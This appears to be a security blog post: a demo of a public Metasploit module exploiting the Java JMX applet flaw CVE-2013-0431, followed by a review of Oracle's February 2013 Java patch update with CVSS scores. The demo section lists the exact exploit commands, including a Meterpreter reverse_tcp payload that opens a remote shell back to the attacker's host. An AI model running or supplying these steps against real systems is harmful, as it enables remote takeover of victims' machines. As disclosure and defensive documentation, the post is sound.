CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations the 2013-01-18
Vulnerability patched by the vendor the 2013-02-01
Vulnerability discovered exploited in the wild by kafeine and EKwatcher the 2013-02-18
Metasploit PoC provided the 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Oracle Java Critical Patch Update February 2013 Review

Oracle has provide his Java Critical Patch Update (CPU) for February 2013 how has been released on Friday, February 1. Initial release date was planned for 19 February but Oracle has push this update earlier due to the active exploitation of one of the critical vulnerabilities in the wild. On the 50 security vulnerabilities, fixed in this CPU, 49 of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 34 vulnerabilities have a CVSS base score upper or equal to 7.0.

It is actually not clear which of these vulnerability is exploited in the wild, but it could be related to CVE-2013-1489, an issue publicly reported and regarding Java SE7 security features introduced in Java SE7 Update 10.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 11 and earlier
  • JDK and JRE 6 Update 38 and earlier
  • JDK and JRE 5.0 Update 38 and earlier
  • SDK and JRE 1.4.2_40 and earlier
  • JavaFX 2.2.4 and earlier

CVE-2012-1541CVE-2012-3213CVE-2012-3342CVE-2012-4301CVE-2013-0425CVE-2013-0426CVE-2013-0428CVE-2013-0436CVE-2013-0437CVE-2013-0439CVE-2013-0441CVE-2013-0442CVE-2013-0445CVE-2013-0446CVE-2013-0447CVE-2013-0450CVE-2013-1472CVE-2013-1475CVE-2013-1476CVE-2013-1477CVE-2013-1478CVE-2013-1479CVE-2013-1480CVE-2013-1481CVE-2013-1482 and CVE-2013-1483 have a CVSS base score of 10.0.

CVE-2012-4305 and CVE-2013-1474 have a CVSS base score of 9.3.

CVE-2012-1543, CVE-2013-0419, CVE-2013-0423, CVE-2013-0429 and CVE-2013-0444 have a CVSS base score of 7.6.

CVE-2013-0351 has a CVSS base score of 7.5.

CVE-2013-0430 has a CVSS base score of 6.9.

CVE-2013-0432 has a CVSS base score of 6.4.

CVE-2013-0409, CVE-2013-0424, CVE-2013-0427, CVE-2013-0431, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0440, CVE-2013-0448, CVE-2013-0449 and CVE-2013-1473 have a CVSS base score of 5.0.

CVE-2013-0438 has a CVSS base score of 4.3.

CVE-2013-0443 has a CVSS base score of 4.0.

CVE-2013-1489 has a CVSS base score of 0.0.